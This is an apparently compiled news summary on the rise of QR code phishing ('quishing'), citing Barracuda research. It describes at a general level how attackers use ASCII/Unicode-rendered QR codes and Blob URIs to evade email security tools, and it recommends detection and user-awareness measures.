Introduction

In recent times, there has been a notable surge in QR code phishing attacks, also known as “quishing.” These attacks pose a significant cybersecurity threat as they exploit QR codes to deceive users into revealing sensitive information. This document delves into the tactics employed by cybercriminals and the challenges faced by security systems in detecting and mitigating these threats.

Description

A significant increase in QR code phishing attacks [3], commonly referred to as “quishing,” has been identified by threat analysts at Barracuda Networks [4]. Data indicates that approximately 1 in 20 mailboxes encountered these attacks in the last quarter of 2023. Quishing is a cybersecurity threat where attackers utilize QR codes to redirect victims to malicious websites or prompt them to download harmful content [1], with the primary objective of stealing sensitive information such as passwords, financial data [1], and personally identifiable information (PII) [1]. This stolen information can be exploited for identity theft [1], financial fraud [1], or ransomware [1].

Scammers are enhancing their tactics to evade detection by security systems [2], employing innovative techniques that include the use of ASCII or Unicode characters, such as ‘Full Block’ (0x2588) [3], to create functional QR codes that appear as nonsensical text to traditional security tools [2]. This method is specifically designed to bypass optical character recognition (OCR) systems [4], rendering the QR codes unreadable to conventional detection tools. As a result, these phishing methods often circumvent traditional defenses [1], such as secure email gateways [1], since QR codes in emails are frequently viewed as meaningless images [1], increasing user vulnerability [1].

In these sophisticated attacks, malicious links are embedded within QR codes that may appear legitimate, such as a ‘Payroll and Benefits Enrollment’ file from an administrator [3]. When scanned [3], these codes can direct victims to counterfeit pages that mimic trusted services, including fraudulent Microsoft login pages and impersonations of major brands like Air Canada, CapitalOne [2], and Chase [2] [5]. Attackers can utilize various encoding methods to generate numerous combinations of these QR codes, complicating detection efforts [3].

Additionally, phishers are increasingly leveraging binary large object universal resource identifiers (URIs) to create phishing pages that are difficult to detect. Blob URIs [2] [4] [5], which are generated in-browser and exist only in memory [2], allow web developers to manage binary data directly within the browser [4], circumventing the need for external servers [4]. As a result, traditional URL filtering and scanning tools may not recognize the content as malicious since Blob URIs do not load data from external URLs [4]. These URIs can also be dynamic and have short lifespans, making them challenging to track and analyze due to their quick expiration [4].

While Barracuda’s research has not observed instances where both techniques—ASCII/Unicode QR codes and Blob URIs—are employed simultaneously, the new methods aim to circumvent detection by complicating the identification and blocking of malicious content. If security technologies flag a potential ASCII QR code phishing attempt [3], it is recommended to capture a screenshot of the email and utilize an OCR engine to extract the URL hidden within the QR code [3]. Low-tech QR code scams persist as well, with criminals covering legitimate QR codes with malicious ones or placing fraudulent QR codes in public spaces [2], such as the recent reports of fraudulent QR code stickers on parking meters by the San Francisco Municipal Transportation Agency.

Conclusion

The rise of quishing attacks underscores the evolving nature of cyber threats and the need for advanced security measures. Organizations must enhance their detection capabilities and educate users about the risks associated with scanning unknown QR codes. As cybercriminals continue to refine their techniques, it is imperative for security systems to adapt and develop more sophisticated methods to identify and neutralize these threats. Proactive measures, such as regular security training and the implementation of robust scanning technologies, are essential to mitigate the impact of these attacks and safeguard sensitive information.

References

[1] https://www.cybersecuritytribe.com/articles/glossary-of-cybersecurity-threats-and-scams-for-2025
[2] https://www.bankinfosecurity.com/malicious-pixels-criminals-revamp-qr-code-phishing-attacks-a-26487
[3] https://blog.barracuda.com/2024/10/09/novel-phishing-techniques-ascii-based-qr-codes-blob-uri
[4] https://www.infosecurity-magazine.com/news/new-gen-malicious-qr-codes/
[5] https://thenimblenerd.com/article/blob-blob-qr-gone-the-new-phishing-threats-sneaking-past-your-security/